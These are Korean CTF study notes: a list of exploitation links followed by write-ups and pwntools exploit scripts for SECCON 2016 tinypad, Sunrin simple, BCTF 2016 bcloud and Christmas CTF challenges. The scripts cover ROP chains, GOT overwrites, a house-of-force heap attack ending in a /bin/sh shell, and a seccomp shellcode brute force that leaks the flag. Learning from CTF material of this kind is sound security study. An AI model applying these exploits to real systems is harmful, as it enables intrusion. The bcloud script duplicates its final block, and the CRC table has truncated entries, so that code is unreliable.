공부할거

공부할거 https://www.lazenca.net/pages/viewpage.action?pageId=1147929 https://www.kernel.org/doc/html/v4.16/userspace-api/seccomp_filter.html https://www.blackhat.com/docs/us-16/materials/us-16-Yason-Windows-10-Segment-Heap-Internals.pdf https://github.com/saaramar/Deterministic_LFH https://www.slideshare.net/AngelBoy1/windows-10-nt-heap-exploitation-english-version http://illmatics.com/Understanding_the_LFH.pdf https://yamoe.tistory.com/208 https://github.com/shellphish/how2heap/tree/master/glibc_2.25 https://github.com/bminor/glibc/blob/master/malloc/malloc.c https://defenit.kr/2019/10/21/Pwn/%E3%84%B4%20Research/%EC%BB%A4%EB%84%90_%EA%B8%B0%EC%B4%88/ https://theori.io/ https://github.com/ctf-wiki/ctf-challenges https://github.com/N4NU/Reversing-Challenges-List https://www.lazenca.net/ https://github.com/topics/ctf-challenges https://www.slideshare.net/AngelBoy1 https://bases-hacking.org/ https://www.lazenca.net/display/TEC/01.Development+of+Kernel+Module https://ctf-wiki.github.io/ctf-wiki/pwn/linux/kernel/basic_knowledge/

2016 Seccon Tinypad

2016-Seccon-tinypad는 house of einherjar 문제이다. [Exploit 방법] heap 주소와 libc 주소를 릭한다. strlen으로 chunk 안의 문자 개수를 판단하고 입력을 하므로, heap에 쓰레기 값을 다른 heap chunk의 size 필드 직전까지 채워 넣는다(poison-null-byte). house of einherjar를 사용한다: prev_size를 (할당된 힙의 주소 - 0x10 - 할당할 위치)로 변경하고, prev_inuse를 0으로 만든다. tinypad 주소에 할당한다. environ 주소로 stack을 leak하고, main의 ret 부분을 구해서...

Sunrin simple

# Sunrin - simple
#
# Exploit script for the "Sunrin simple" CTF binary ('problem'). The padding
# ('A'*0x38) is followed by a ROP chain built from fixed addresses; every
# gadget address and the __libc_fork offsets quoted below are specific to
# the challenge binary and the libc it was solved against, so the script is
# not portable to any other build.
from pwn import *

#context.log_level='debug'

r=process('problem')
e=ELF('problem')
libc=e.libc
syscall='\x7b'   # not used below
#write='\xb9'
#0x00000000004005fc : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret

# gdb dump kept by the author for reference (no-op string statement).
'''0x7ffff7ad9517 <__libc_fork+471>:       mov    eax,r13d
0x7ffff7ad951a <__libc_fork+474>:       pop    rbx
0x7ffff7ad951b <__libc_fork+475>:    pop    r12
0x7ffff7ad951d <__libc_fork+477>:    pop    r13
0x7ffff7ad951f <__libc_fork+479>:    pop    r14
0x7ffff7ad9521 <__libc_fork+481>:    pop    r15
0x7ffff7ad9523 <__libc_fork+483>:    pop    rbp
0x7ffff7ad9524 <__libc_fork+484>:    ret'''

payload='A'*0x38

# NOTE(review): 0x400601 / 0x400603 sit inside the pop-r12..r15 gadget at
# 0x4005fc (commented above); they look like the mid-instruction
# `pop rsi; pop r15; ret` and `pop rdi; ret` gadgets — confirm in a disassembler.
# Stage 1: read() into alarm's GOT entry, then into read's GOT entry.
payload+=p64(0x400601)
payload+=p64(e.got['alarm'])
payload+=p64(0xdeadbeef)
payload+=p64(e.plt['read'])

payload+=p64(0x400601)
payload+=p64(e.got['read'])
payload+=p64(0xdeadbeef)
payload+=p64(e.plt['read'])

# Stage 2: calls through alarm@plt / read@plt with r12..r15 and rdi/rsi set
# from the stack, then returns to main so a second payload can be sent.
payload+=p64(0x4005fc)
payload+=p64(1)*4
payload+=p64(e.plt['alarm'])
payload+=p64(0)*6
payload+=p64(0x400603)
payload+=p64(1)
payload+=p64(e.plt['read'])
payload+=p64(0x400603)
payload+=p64(0)
payload+=p64(0x400601)
payload+=p64(e.got['alarm'])*2
payload+=p64(e.plt['alarm'])
payload+=p64(0)*6
payload+=p64(e.plt['read'])
payload+=p64(e.symbols['main'])

# The sleeps separate the sends so each read() in the chain consumes exactly
# the bytes intended for it; the 2-byte value 0x9517 matches the low bytes of
# the __libc_fork+471 address in the dump above (partial GOT overwrite).
sleep(0.1)
r.send(payload)
sleep(0.1)
r.send(p16(0x9517))
sleep(0.1)
r.send('\x5e')
sleep(0.1)
# NOTE(review): the bare except swallows every error (including a timeout on
# recvuntil and KeyboardInterrupt); if it fires, `leak` is never bound and the
# `leak+...` line below raises NameError instead of a readable failure.
# The -0xe adjustment is an author-chosen offset; its origin is not shown here.
try:
        leak=u64(r.recvuntil('\x7f').ljust(8,'\x00'))-libc.symbols['read']-0xe
        log.info(hex(leak))
except:
        pass
#raw_input()
r.send(p16(0x9200))
sleep(0.1)

# Second payload: same padding, then system("/bin/sh") via the leaked libc base.
payload='A'*0x38
payload+=p64(0x400603)
payload+=p64(leak+list(libc.search("/bin/sh"))[0])
payload+=p64(leak+libc.symbols['system'])
r.send(payload)

r.interactive()

2016_bctf_bcloud

간단한 house_of_force 문제이다. name을 입력하는 부분에서 heap 주소를 구할 수 있다. 그리고 Org와 Host를 입력하는 것을 잘 이용해 top_chunk를 덮을 수 있다. top_chunk를 덮었으므로 내가 원하는 주소를 할당받을 수 있다.

32bit : “원하는 주소” - 8 - top_chunk 주소
64bit : “원하는 주소” - 16 - top_chunk 주소

note_size를 받는 부분을 할당받아 note_list를 덮어서 적당히 exploit하면 된다.

```python
from pwn import *

def new(size,content):
        sla('--->>','1')
        sla('content:\n',str(size))
        sla('content:\n',content)

def edit(idx,content):
        sla('>>','3')
        sla('id:\n',str(idx))
        sla('content:\n',content)

def delete(idx):
        sla('>>','4')
        sla('id:\n',str(idx))

def syn():
        sla('>>','5')

r=process('./bcloud')
e=ELF('./bcloud')
libc=e.libc

sla=lambda x,y : r.sendlineafter(x,y)
sa=lambda x,y : r.sendafter(x,y)
ru=lambda x : r.recvuntil(x)


sa('name:\n','A'*0x40)
ru('A'*0x40)
heap_base=u32(ru('!').replace('!','').ljust(4,'\x00'))-8
log.info(hex(heap_base))

sa('Org:\n','A'*0x40)
sla('Host:\n',p32(0xffffffff))

heap_list=0x804B120
note_size=0x804B0A0

fake=note_size-0x8-(heap_base+0xd8)-4-4-7
new(fake,'\n')

payload=p32(8)*10+p32(heap_base+0x98)+p32(heap_base+8)
payload+=p64(0)*10+p32(e.got['free'])+p32(e.got['atoi'])*2
new(0x100,payload)
edit(0,p32(e.plt['puts']))
delete(2)

libc_leak=u32(r.recv(4).ljust(4,'\x00'))-libc.symbols['atoi']
log.info(hex(libc_leak))

edit(1,p32(libc_leak+libc.symbols['system']))
r.recvuntil('>>')
r.sendline('/bin/sh')

r.interactive()

edit(0,p32(e.plt['puts']))
delete(2)

libc_leak=u32(r.recv(4).ljust(4,'\x00'))-libc.symbols['atoi']
log.info(hex(libc_leak))

edit(1,p32(libc_leak+libc.symbols['system']))
r.recvuntil('>>')
r.sendline('/bin/sh')

r.interactive()
```

Christmas ctf

Christmas CTF

1. Solo_test

간단한 ROP이다.

```python
from pwn import *

r=remote('115.68.235.72',1337)
e=ELF('./solo_test')
libc=e.libc

sla=r.sendlineafter
sa=r.sendafter
pr=0x0000000000400b83

answer=['Me','No','CTF','Never','No']
for i in range(len(answer)):
    sla('>>',answer[i])

payload='A'*0x58
payload+=p64(pr)
payload+=p64(e.got['puts'])
payload+=p64(e.plt['puts'])
payload+=p64(e.symbols['solo'])
sla('-->',payload)

leak=u64(r.recvuntil('\x7f').replace('\x20','').ljust(8,'\x00'))-0x83cc0
log.info(hex(leak))

payload='A'*0x58
payload+=p64(leak+0x106ef8)

sla('-->',payload)

r.interactive()
```

2. babyseccomp

mmap이 안 걸려 있다. mmap으로 매핑하고 error based shellcoding을 하면 될 것 같다.

```python
from pwn import *
import string

context.arch = 'amd64'
#context.log_level="error"

flag = 'XMAS{'

for i in range(5, 100):
    for j in string.printable:
        shellcode =  shellcraft.mmap(0, 0x1000, 1, 1, 3, 0)
        #p = remote("115.68.235.72", 23457)
        p = process('./babyseccomp')
        shellcode += '''\
            go:
            mov bl, [rax + {}]
            what:
            mov rcx, {}
            cmp rbx,rcx
            mov rax,0xdeadbeef
            jnz go
            jmp what
        '''.format(i, ord(j))

        p.sendafter(': ', asm(shellcode))

        try:
            p.recvuntil("Seg", timeout=2)
            flag += j
            print flag
            p.close()
            break
        except:
            p.close()
            continue
```

참고: http://ipwn.kr/index.php/2019/07/01/isitdtu-ctf-2019-write-up/

3.
Welcome_rev

(참고: 아래 dword 표는 표준 CRC-32 테이블(0x0EDB88320 다항식)로 보이는데, 이 복사본에서는 `0x6DE4EB`, `0x621F`, `0x3895D7`처럼 "DD"가 빠져 짧아진 항목이 여럿 있다. 그대로 복붙하지 말고 원본 바이너리의 표와 대조해서 쓰는 것이 안전하다.)

```python
dword=[0x0,0x77073096,0x0EE0E612C,0x990951BA,0x76DC419,0x706AF48F,0x0E963A535,0x9E6495A3,
0x0EDB8832,0x79DCB8A4,0x0E0D5E91E,0x97D2D988,0x9B64C2B,0x7EB17CBD,0x0E7B82D07,0x90BF1D91,
0x1DB71064,0x6AB020F2,0x0F3B97148,0x84BE41DE,0x1ADAD47D,0x6DE4EB,0x0F4D4B551,0x83D385C7,
0x136C9856,0x646BA8C0,0x0FD62F97A,0x8A65C9EC,0x14015C4F,0x63066CD9,0x0FA0F3D63,0x8D080DF5,
0x3B6E20C8,0x4C69105E,0x0D56041E4,0x0A2677172,0x3C03E4D1,0x4B04D447,0x0D20D85FD,0x0A50AB56B,
0x35B5A8FA,0x42B2986C,0x0DBBBC9D6,0x0ACBCF940,0x32D86CE3,0x45DF5C75,0x0DCD60DCF,0x0ABD13D59,
0x26D930AC,0x51DE003A,0x0C8D75180,0x0BFD06116,0x21B4F4B5,0x56B3C423,0x0CFBA9599,0x0B8BDA50F,
0x2802B89E,0x5F058808,0x0C60CD9B2,0x0B10BE924,0x2F6F7C87,0x58684C11,0x0C1611DAB,0x0B6662D3D,
0x76DC4190,0x1DB7106,0x98D220BC,0x0EFD5102A,0x71B18589,0x6B6B51F,0x9FBFE4A5,0x0E8B8D433,
0x7807C9A2,0x0F00F934,0x9609A88E,0x0E10E9818,0x7F6A0DBB,0x86D3D2D,0x91646C97,0x0E6635C01,
0x6B6B51F4,0x1C6C6162,0x856530D8,0x0F262004E,0x6C0695ED,0x1B01A57B,0x8208F4C1,0x0F50FC457,
0x65B0D9C6,0x12B7E950,0x8BBEB8EA,0x0FCB9887C,0x621F,0x15DA2D49,0x8CD37CF3,0x0FBD44C65,
0x4DB26158,0x3AB551CE,0x0A3BC0074,0x0D4BB30E2,0x4ADFA541,0x3895D7,0x0A4D1C46D,0x0D3D6F4FB,
0x4369E96A,0x346ED9FC,0x0AD678846,0x0DA60B8D0,0x44042D73,0x33031DE5,0x0AA0A4C5F,0x00D7CC9,
0x5005713C,0x270241AA,0x0BE0B1010,0x0C90C2086,0x5768B525,0x206F85B3,0x0B966D409,0x0CE61E49F,
0x5EDEF90E,0x29D9C998,0x0B0D09822,0x0C7D7A8B4,0x59B33D17,0x2EB40D81,0x0B7BD5C3B,0x0C0BA6CAD,
0x0EDB88320,0x9ABFB3B6,0x3B6E20C,0x74B1D29A,0x0EAD54739,0x9277AF,0x4DB2615,0x73DC1683,
0x0E3630B12,0x94643B84,0x0D6D6A3E,0x7A6A5AA8,0x0E40ECF0B,0x9309FF9D,0x0A00AE27,0x7D079EB1,
0x0F00F9344,0x8708A3D2,0x1E01F268,0x6906C2FE,0x0F762575D,0x806567CB,0x196C3671,0x6E6B06E7,
0x0FED41B76,0x89D32BE0,0x10DA7A5A,0x674ACC,0x0F9B9DF6F,0x8EBEEFF9,0x17B7BE43,0x60B08ED5,
0x0D6D6A3E8,0x0A1D1937E,0x38D8C2C4,0x4FDFF252,0x0D1BB67F1,0x0A6BC5767,0x3FB506,0x48B2364B,
0x0D80D2BDA,0x0AF0A1B4C,0x36034AF6,0x41047A60,0x0DF60EFC3,0x0A867DF55,0x316E8EEF,0x4669BE79,
0x0CB61B38C,0x0BC66831A,0x256FD2A0,0x5268E236,0x0CC0C7795,0x0BB0B4703,0x220216B9,0x5505262F,
0x0C5BA3BBE,0x0B2BD0B28,0x2BB45A92,0x5CB36A04,0x0C2D7FFA7,0x0B5D0CF31,0x2CD99E8B,0x5BDEAE1D,
0x9B64C2B0,0x0EC63F226,0x756AA39C,0x26D930A,0x9C0906A9,0x0EB0E363F,0x72076785,0x5005713,
0x95BF4A82,0x0E2B87A14,0x7BB12BAE,0x0CB61B38,0x92D28E9B,0x0E5D5BE0D,0x7CDCEFB7,0x0BDBDF21,
0x86D3D2D4,0x0F1D4E242,0x68B3F8,0x1FDA836E,0x81BE16CD,0x0F6B9265B,0x6FB077E1,0x18B74777,
0x88085AE6,0x0FF0F6A70,0x66063BCA,0x11010B5C,0x8F659EFF,0x0F862AE69,0x616BFFD3,0x166CCF45,
0x0A00AE278,0x0D702EE,0x4E048354,0x3903B3C2,0x0A7672661,0x0D06016F7,0x4969474D,0x3E6E77DB,
0x0AED16A4A,0x0D9D65ADC,0x40DF0B66,0x37D83BF0,0x0A9BCAE53,0x0DEBB9EC5,0x47B2CF7F,0x30B5FFE9,
0x0BDBDF21C,0x0CABAC28A,0x53B39330,0x24B4A3A6,0x0BAD03605,0x0C70693,0x54DE5729,0x23D967BF,
0x0B3667A2E,0x0C4614AB8,0x5D681B02,0x2A6F2B94,0x0B40BBE37,0x0C30C8EA1,0x5A05DF1B,0x2D02EF8D]
enc=[0x376740b3,0x94789c6e,0x66485793,0x56e8bf0e,0xd5f139c0]

flag='XMAS{'
flag_fake=''
import string

for i in string.printable:
    if(dword[0xff^ord(i)] == 0xead54739):
        print('0 : '+i)
    if(dword[0xc6^ord(i)] == 0xcb61b38c):
        print('1 : '+i)
    if(dword[0x34^ord(i)] == 0x1ca7eafb):
        print('2 : '+i)
    if(dword[0xfb^ord(i)] == 0x94643b84):
        print('3 : '+i)

print('---')
for i in string.printable:
        if(dword[0xff^ord(i)] == 0x4db2615):
                print('0 : '+i)
        if(dword[0xea^ord(i)] == 0x6906c2fe):
                print('1 : '+i)
        if(dword[0x27^ord(i)] == 0x5edef90e):
                print('2 : '+i)
        if(dword[0xe8^ord(i)] == 0x9309ff9d):
                print('3 : '+i)
print('---')
for i in string.printable:
        if(dword[0xff^ord(i)] == 0x17b7be43):
                print('0 : '+i)
        if(dword[0xbc^ord(i)] == 0xbdbdf21):
                print('1 : '+i)
        if(dword[0x60^ord(i)] == 0x646ba8c0):
                print('2 : '+i)
        if(dword[0x57^ord(i)] == 0xedb8832):
                print('3 : '+i)
print('---')
for i in string.printable:
    if(dword[0xff^ord(i)] == 0xf9b9df6f):
        print('0 : '+i)
    if(dword[0x90^ord(i)] == 0x4e048354):
        print('1 : '+i)
    if(dword[0x74^ord(i)] == 0x83d385c7):
        print('2 : '+i)
    if(dword[0x02 ^ ord(i)] == 0xc0ba6cad):
        print('3 : '+i)
```

시간 안에 못 푼 것: adult seccomp. https://pwn3r.tistory.com/entry/SECCON-2018-QUAL-Simple-memo?category=801826 여기 있는 것을 복붙한다. 하지만 조금 바꿔야 한다. 대충 사진에...